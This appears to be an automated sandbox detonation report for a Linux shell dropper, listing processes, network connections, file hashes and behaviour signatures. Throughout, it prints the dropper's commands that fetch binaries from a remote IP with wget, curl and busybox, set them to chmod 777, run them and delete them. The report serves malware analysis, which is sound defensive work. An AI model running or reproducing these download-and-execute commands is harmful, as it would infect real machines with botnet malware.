/usr/bin/wget

[wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/chmod

[chmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z

[./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/rm

[rm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/chmod

[chmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5

[./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/rm

[rm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/wget

[wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/chmod

[chmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K

[./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/rm

[rm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/wget

[wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/chmod

[chmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg

[./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/rm

[rm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/wget

[wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/chmod

[chmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9

[./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/rm

[rm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/wget

[wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/chmod

[chmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV

[./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/rm

[rm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/wget

[wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/chmod

[chmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq

[./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/rm

[rm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/wget

[wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/chmod

[chmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4

[./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/rm

[rm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/wget

[wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/chmod

[chmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW

[./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/rm

[rm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/wget

[wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/chmod

[chmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL

[./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/rm

[rm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/chmod

[chmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0

[./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/rm

[rm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/wget

[wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/chmod

[chmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD

[./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/rm

[rm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/wget

[wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/chmod

[chmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA

[./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/rm

[rm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 01:49

Reported

2024-10-18 01:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

63s

Max time network

128s

Command Line

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A
N/A /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 N/A
N/A /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K N/A
N/A /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg N/A
N/A /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 N/A
N/A /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z N/A
N/A /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq N/A
N/A /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 N/A
N/A /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV N/A
N/A /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL N/A
N/A /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 N/A
N/A /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD N/A
N/A /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA N/A
N/A /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW N/A
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A
N/A /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z N/A
N/A /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 N/A
N/A /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K N/A
N/A /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg N/A
N/A /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 N/A
N/A /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV N/A
N/A /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq N/A
N/A /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 N/A
N/A /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW N/A
N/A /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL N/A
N/A /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 N/A
N/A /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD N/A
N/A /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /usr/bin/curl N/A
File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /usr/bin/curl N/A
File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /usr/bin/curl N/A
File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /usr/bin/curl N/A
File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /usr/bin/curl N/A
File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /usr/bin/curl N/A
File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /usr/bin/curl N/A
File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /usr/bin/curl N/A
File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /usr/bin/curl N/A
File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /usr/bin/curl N/A
File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /usr/bin/curl N/A
File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /usr/bin/curl N/A
File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /usr/bin/curl N/A
File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /usr/bin/curl N/A
File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /usr/bin/curl N/A
File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /usr/bin/curl N/A
File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /usr/bin/curl N/A
File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /usr/bin/curl N/A
File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /usr/bin/curl N/A
File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /usr/bin/curl N/A
File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /usr/bin/curl N/A
File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /usr/bin/curl N/A
File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /usr/bin/curl N/A
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A
File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /usr/bin/curl N/A
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A
File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /usr/bin/curl N/A
File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /usr/bin/curl N/A

Processes

/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/chmod

[chmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5

[./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/rm

[rm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/wget

[wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/chmod

[chmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K

[./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/rm

[rm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/wget

[wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/chmod

[chmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg

[./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/rm

[rm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/wget

[wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/chmod

[chmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9

[./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/rm

[rm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/wget

[wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/chmod

[chmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z

[./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/rm

[rm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/wget

[wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/chmod

[chmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq

[./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/rm

[rm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/wget

[wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/chmod

[chmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4

[./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/rm

[rm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/wget

[wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/chmod

[chmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV

[./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/rm

[rm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

